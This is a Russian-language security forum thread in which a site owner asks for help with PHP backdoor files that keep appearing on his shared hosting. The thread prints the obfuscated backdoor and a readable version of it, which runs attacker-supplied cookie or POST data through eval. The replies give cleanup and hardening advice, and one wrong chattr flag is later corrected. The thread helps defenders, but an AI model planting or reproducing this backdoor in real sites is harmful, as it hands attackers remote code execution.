ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.05.2018, 13:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
389
Репутация:
0
|
|
У меня есть виртуальный хостинг с 10+ сайтами от ru-center
Структура в FTP такая:
- /site1.com/public_html
- /site2.com/public_html
- /site3.com/public_html
- ...
Каким-то образом на хостинге появляются новые файлы. Примерно по 3-4 в корень каждого сайта. Файлы такого вида:
- 76nt0hgr.php
- ajax28.php
- hmbjcewn.php
Пример содержания одного из них:
$cejrm){function twojb($ejlnjbs, $hhvsm, $jkzowhs){return $ejlnjbs[6]($ejlnjbs[4]($hhvsm . $ejlnjbs[2], ($jkzowhs / $ejlnjbs[8]($hhvsm)) + 1), 0, $jkzowhs);}function llhbte($ejlnjbs, $jxzkvi){return @$ejlnjbs[9]($ejlnjbs[0], $jxzkvi);}function flkmrh($ejlnjbs, $jxzkvi){$gtuyb = $ejlnjbs[3]($jxzkvi) % 3;if (!$gtuyb) {eval($jxzkvi[1]($jxzkvi[2]));exit();}}$cejrm = llhbte($ejlnjbs, $cejrm);flkmrh($ejlnjbs, $ejlnjbs[5]($ejlnjbs[1], $cejrm ^ twojb($ejlnjbs, $hhvsm, $ejlnjbs[8]($cejrm))));}
И что самое интересное, вирус редактирует файл index.php, добавляя в самое начало файла примерно такой код (для каждого сайта немного отличается, но вид одинаковый): |
|
|
|
28.05.2018, 12:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
52834
Репутация:
47
|
|
Забавный код и очень непонятный.
Код:
Code:
foreach(array_merge($_COOKIE, $_POST) as $hhvsm => $cejrm)
{
function twojb($ejlnjbs, $hhvsm, $jkzowhs)
{
return substr(str_repeat($hhvsm . "97462d1c-4491-4c8d-b4ba-249a1aee81e6", ($jkzowhs / strlen($hhvsm)) + 1), 0, $jkzowhs);
}
function llhbte($ejlnjbs, $jxzkvi)
{
return @pack("H*", $jxzkvi)''
}
function flkmrh($ejlnjbs, $jxzkvi)
{
$gtuyb = count($jxzkvi) % 3;
if(!$gtuyb)
{
eval($jxzkvi[1]($jxzkvi[2]));
exit();
}
}
$cejrm = llhbte($ejlnjbs, $cejrm);
flkmrh($ejlnjbs, explode("#", $cejrm ^ twojb($ejlnjbs, $hhvsm, strlen($cejrm))));
}
В больше файлов нет никаких?
Содержимое всех файлов в студию. |
|
|
|
28.05.2018, 12:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
187765
Репутация:
154
|
|
1) Проверить даты изменения всех файлов + системное время
2) Проверить bash_history
3) Проверить crontab, /etc/cron.d и т.п. spool
4) Проверить список демонов в авторане
5) Проверить список запущенных процессов и сервисов. А так же какие службы слушают порты на данный момент.
6) Переналить образ? выполнить дифф всех файлов с дохакерской версией сайт(ов).
7) Настроить .htaccess и разграничить серверами пределы сайтов.
8) Проанализировать логи apache|nginx на предмет как могут попадать. Так же интересно глянуть syslog.
9) Обратиться к @winstrool за профессиональной помощью (коммерческий вариант) |
|
|
|
28.05.2018, 22:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
20361
Репутация:
46
|
|
если хочешь понять первопричину взлома - грепай логи веб серверов,ftp и ssh коннектов
если хочешь усложнить атакующему жизнь и минимизировать удар:
Код:
Code:
chown -R 0:0 /site1.com/public_html/
find /site1.com/public_html/ -type f -exec chmod 644 {} \;
find /site1.com/public_html/ -type d -exec chmod 755 {} \;
на те директории, в которые нужно писать всем(например uploads,cache,images), устанавливаешь права 777 и через .htaccess отключаешь php движок в этих директориях
таким образом, если атакер заливает шелл через уязвимость в CMS, то больше не зальёт ибо в общедоступных директориях его шелл не запустится, а если его шелл уже надёжно спрятан и ты его не можеш найти - то он всё равно не сможет записать свой вредоносный код в index.php ибо прав нет
ну и конечно поменять все пароли на ftp/ssh, обновить все пакеты до актуального состояния
если после всего проделанного всё равно внедряют код в файлы сайта - значит у атакера есть root привилегии, а это значит только одно:туши свет и бросай гранату(сноси всю ОС и ставь всё по новой) |
|
|
|
29.05.2018, 09:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
96779
Репутация:
5
|
|
Возможно плагины под wp имеют RCE.
|
|
|
|
30.05.2018, 14:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
389
Репутация:
0
|
|
Всем спасибо за ответ. В логах apache я еще такие запросы заметил (это только часть), как раз к загруженным кем-то файлам. Странно еще, что везде разный IP
[Fri May 25 11:09:22.307068 2018] [php7:error] [pid 31380] [client 37.59.44.168:41908] script '/home/cs-list/mysite.ru/docs/modules.php' not found or unable to stat, referer: http://www.mysite.ru/modules.php?name=Forums
[Fri May 25 11:55:27.594034 2018] [php7:error] [pid 31389] [client 188.225.17.7:52972] script '/home/cs-list/mysite.ru/docs/img/nwwgtkyj.php' not found or unable to stat, referer: https://mysite.ru/img/nwwgtkyj.php
[Fri May 25 11:55:35.363493 2018] [php7:error] [pid 31387] [client 50.62.161.88:53882] script '/home/cs-list/mysite.ru/docs/fonts/xekvmfpc.php' not found or unable to stat, referer: https://mysite.ru/fonts/xekvmfpc.php
[Fri May 25 11:55:40.011106 2018] [php7:error] [pid 31387] [client 210.48.152.152:54466] script '/home/cs-list/mysite.ru/docs/js/hqibovju.php' not found or unable to stat, referer: https://mysite.ru/js/hqibovju.php
[Fri May 25 11:55:40.839767 2018] [php7:error] [pid 31387] [client 92.53.96.44:54566] script '/home/cs-list/mysite.ru/docs/img/bakewxnj.php' not found or unable to stat, referer: https://mysite.ru/img/bakewxnj.php
А в разделе Безопасность в хостинге ru-center эти левые файлы система хостинга распознала как Trojan |
|
|
|
31.05.2018, 00:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
169212
Репутация:
441
|
|
Если хостер не решает проблему сам, значит жалоб со стороны клиентов нет, и с сервером всё впорядке.
Скорее всего причина на вашей стороне. Слабые пароли, уязвимый/протрояненый софт/плагины.
Не решив проблему как можно скорее, существует риск потери позиций сайтов в поисковой выдаче, попадание в антивирусные/спам листы, что повлечёт за собой снижение дохода. В этом случае лучше не медлить и обратиться к специалистам, которые поставят всё на контроль, вычистят и залатают.
Сообщение от sirjay
sirjay said:
↑
Странно еще, что везде разный IP Похоже это другие заражённые хосты. |
|
|
|
31.05.2018, 00:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Советую
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]https[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]/forums/110/[/COLOR][/COLOR]
|
|
|
|
31.05.2018, 13:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
20807
Репутация:
1
|
|
Хостился у нас сайт дружественной компании, с дырявым битрикс. Происходило с ним что-то очень похожеее, а нанимать кого-то для обновления компания не хотела, мотивируя тем что вот-вот закажет новый сайт с нуля.
Так чтобы не заморачиваться, удалили левые php файлы, инклюды, а на оставшиеся сделали:
sudo chattr -R -i /home/bitrix/
*immutable. Указывает, что файл защищен от изменений: не может быть удален или переименован, никакая ссылка (жесткая) не может быть создана на этот файл, никакие данные не могут быть записаны в файл.
Можно так же сделать, пока разбор полетов идет
|
|
|
|
31.05.2018, 16:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
20361
Репутация:
46
|
|
Сообщение от DmitryU
DmitryU said:
↑
sudo chattr -R -i /home/bitrix/
Код:
Code:
sudo chattr -R +i /home/bitrix/
-i снимает атрибут
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
